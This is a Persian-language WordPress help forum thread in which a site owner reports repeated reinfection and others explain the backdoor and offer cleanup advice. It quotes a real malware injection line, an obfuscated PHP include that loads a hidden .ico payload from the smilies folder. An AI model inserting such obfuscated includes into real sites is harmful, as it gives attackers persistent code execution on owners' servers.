رفتن به مطلب

ویروسی شدن وردپرس


tanha66

پست های پیشنهاد شده

سلام دوستان من دوتا سایت دارم که ویروسی شده

در بعضی فایل ها کد زیر رو اضافه میکنه و یسری فایل ها هم روی هاست آپلود میکنه.حجم دیتابیس رو زیاد میکنه و تو سرچ گوگل هم تداخل ایجاد میکنه

کسی میتونه حلش کنه.سایت رو دوباره نصب کردم و فایل های آپلودی و دیتابس قبلی رو استفاده کردم ولی بازم خراب شد.

/*77177*/

@include "\057h\157m\145/\151c\155a\163h\150a\144/\144o\155a\151n\163/\151c\155a\163h\150a\144.\151r\057p\162i\166a\164e\137h\164m\154/\167p\055i\156c\154u\144e\163/\151m\141g\145s\057s\155i\154i\145s\057.\0654\066e\144f\0608\056i\143o";

/*77177*/

این کد رو به ایندکس و فایل کانفیگ بیشتر اضافه میکنه

 

 

لینک به ارسال

وارد هاست بشید. به این آدرس برید : icmashhad.ir/private_html/wp-includes/images/smilies/

این فایل رو پیدا و حذف کنید : .546edf08.ico

اگر مشکل حل شد که هیچ. بیاین یه لایک بزنیدB)

اگر مشکل دوباره ظاهر شد (که احتمالش زیاده) ینی هکر علاوه بر این فایل یک Backdoor هم درست کرده . و باید تمام فایلها بررسی بشه.

 

لینک به ارسال
در ۱ ساعت قبل، tanha66 گفته است :

سلام دوستان من دوتا سایت دارم که ویروسی شده

در بعضی فایل ها کد زیر رو اضافه میکنه و یسری فایل ها هم روی هاست آپلود میکنه.حجم دیتابیس رو زیاد میکنه و تو سرچ گوگل هم تداخل ایجاد میکنه

کسی میتونه حلش کنه.سایت رو دوباره نصب کردم و فایل های آپلودی و دیتابس قبلی رو استفاده کردم ولی بازم خراب شد.

/*77177*/

@include "\057h\157m\145/\151c\155a\163h\150a\144/\144o\155a\151n\163/\151c\155a\163h\150a\144.\151r\057p\162i\166a\164e\137h\164m\154/\167p\055i\156c\154u\144e\163/\151m\141g\145s\057s\155i\154i\145s\057.\0654\066e\144f\0608\056i\143o";

/*77177*/

این کد رو به ایندکس و فایل کانفیگ بیشتر اضافه میکنه

 

 

سلام

باید دونه به دونه ی فایلها رو ویرایش و پاک کنید.

افزونه WordFence رو هم نصب داشته باشید

فولدرهای includes و admin رو هم پاک کنید و دوباره آپلود کنید.

 

لینک به ارسال

دوستان من وردپرس رو دوباره نصب کردم و فقط فایل های آپلودی و دیتابیس رو جایگزین کردم باز مشکل پابرجا هستش.

پس دو مورد بالا منتفی هستش 

افزونه های امنیتی هم نصب کردم جواب نداد

حتی سطح دسترسی به فایل کانفیگ رو هم عوض کردم و 444 کردم باز روز بعد که وارد میشم سطح دسترسی 755 میشه

خودم فکر میکنم کدی تو دیتابیس نشسته باشه 

لینک به ارسال

سلام

این موارد کافی نیست

باید بررسی کلی صورت بگیره

دیتابیس و htaccess رو هم چک کنید

اگر دانش کافی در این خصوص رو ندارید بدید یک شخص متخصص براتون انجام بده

پ.ن : ممکنه این مشکل کلا رفع نشه و به اجبار از ابتدا پروژه رو شروع کنید

به همین دلایل تاکید میکنیم که از محصولات نال شده استفاده نکنید

لینک به ارسال
در 1 ساعت قبل، tanha66 گفته است :

دوستان من وردپرس رو دوباره نصب کردم و فقط فایل های آپلودی و دیتابیس رو جایگزین کردم باز مشکل پابرجا هستش.

پس دو مورد بالا منتفی هستش 

افزونه های امنیتی هم نصب کردم جواب نداد

حتی سطح دسترسی به فایل کانفیگ رو هم عوض کردم و 444 کردم باز روز بعد که وارد میشم سطح دسترسی 755 میشه

خودم فکر میکنم کدی تو دیتابیس نشسته باشه 

باید سایتتون بررسی بشه.

اینجوری نمیشه دقیق گفت. فقط میتونیم توی کلیات راهنمایی کنیم.

لینک به ارسال
در 2 ساعت قبل، tanha66 گفته است :

دوستان من وردپرس رو دوباره نصب کردم و فقط فایل های آپلودی و دیتابیس رو جایگزین کردم باز مشکل پابرجا هستش.

پس دو مورد بالا منتفی هستش 

افزونه های امنیتی هم نصب کردم جواب نداد

حتی سطح دسترسی به فایل کانفیگ رو هم عوض کردم و 444 کردم باز روز بعد که وارد میشم سطح دسترسی 755 میشه

خودم فکر میکنم کدی تو دیتابیس نشسته باشه 

فایل های اپلودی رو که مجدد بارگزاری کردید رو بررسی کردید؟

جداول دیتابیس هم بررسی کنید. 

لینک به ارسال
در در ۱۴۰۰/۶/۲۶ در 16:30، Mesmaili گفته است :

فایل های اپلودی رو که مجدد بارگزاری کردید رو بررسی کردید؟

جداول دیتابیس هم بررسی کنید. 

کجاش رو بررسی کنم.دنبال چی باشم؟

الان یسری فایل ها رو پاک کردم و فعلا فقط روی فایل کانفیگ دستکاری میکنه 

راهی هستش که مسیر فایل یا نام کانفیگ رو عوض کنم برای کل وردپرس

لینک به ارسال
در 49 دقیقه قبل، tanha66 گفته است :

کجاش رو بررسی کنم.دنبال چی باشم؟

الان یسری فایل ها رو پاک کردم و فعلا فقط روی فایل کانفیگ دستکاری میکنه 

راهی هستش که مسیر فایل یا نام کانفیگ رو عوض کنم برای کل وردپرس

طبیعتا شما پوشه تصاویر رو میخواید منتقل کنید.

در پوشه ها بگردید که فایلی جز تصاویر وجود نداشته باشه.

مسیر کانفیگ هم عوض کنید در صورتی که ویروس رو پیدا و پاک  نکنید هیچ تاثیری نداره

لینک به ارسال
در ۱ ساعت قبل، tanha66 گفته است :

کجاش رو بررسی کنم.دنبال چی باشم؟

الان یسری فایل ها رو پاک کردم و فعلا فقط روی فایل کانفیگ دستکاری میکنه 

راهی هستش که مسیر فایل یا نام کانفیگ رو عوض کنم برای کل وردپرس

این سیستم نفوذ به این صورته که  ، حدود هفت تا هشت تا فایل php در جاهای مختلف وبسایتت گذاشته، این فایلها کدی به ایندکس و کانفیگ میده که آدرس میده به فایلهای .ico که یه نمونش توی ادرس اول مشخصه. این فایلها هم هر کدی بخان اجرا میکنن. واسه همینه که گفتم احتمال زیاد مشکل برقرار میمونه.

راهکار هم یه راه و روش مشخص نیست. و حتی اسم فایلها هم هرچیزی میتونه گذاشته باشه. فقط یک اسم که واسه فایل ویروس وجود نداره که. کد توی فایل مهمه.

این فایلای php در هر پوشه ای میتونه باشه. از هسته وردپرس گرفته تا قالب و افزونه های شما. باید کامل سایت رو یکی که آشنا به این مسائل هست بررسی کنه. باید فایلای پی اچ پی و ico مشکوک رو بررسی و حذف کنید. حالا یا میتونید آزمون و خطا بزنید همه فایلارو پاک کنید که راه به جایی نمی برید و بدتر هم میشه ... یا به کسی بدید سایت رو پاک سازی کنه.

سر همچین مشکلی، با انجمنهای وردپرس، به جایی نمی رسید.

اگر تعداد پست ها کمه ، که یه سایت از اول بسازید و هیچ فایلی از این فایلهای ویروسی منتقل نکنید و نوشته هارو کپی کنید اونجا. راه آسون و مطمئن تر و کم هزینه تر. (اگر این روش رو پیش گرفتید دیگه قالب و افزونه نال و کرک هم از کلاهبرداران نسل جدید نخرید. همینا این بلا رو سر سایت اورده. طراح 25 هزار تومنی هم واسه ساخت سایت استخدام نکنید.)

اگر هم سایت شکل گرفته و محتوا زیاده که باید شخصی سایت رو بررسی کنه و همونطور که دوستان گفتن بازم اطمینان صددرصدی از پاکسازی کامل وجود نداره. کسی که راه نفوذ در سایتی پیدا کرد به این راحتی به گذاشتن دوتا فایل و کد بسنده نمیکنه.

ویرایش شده توسط ramin.moradi
لینک به ارسال

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

×
×
  • اضافه کردن...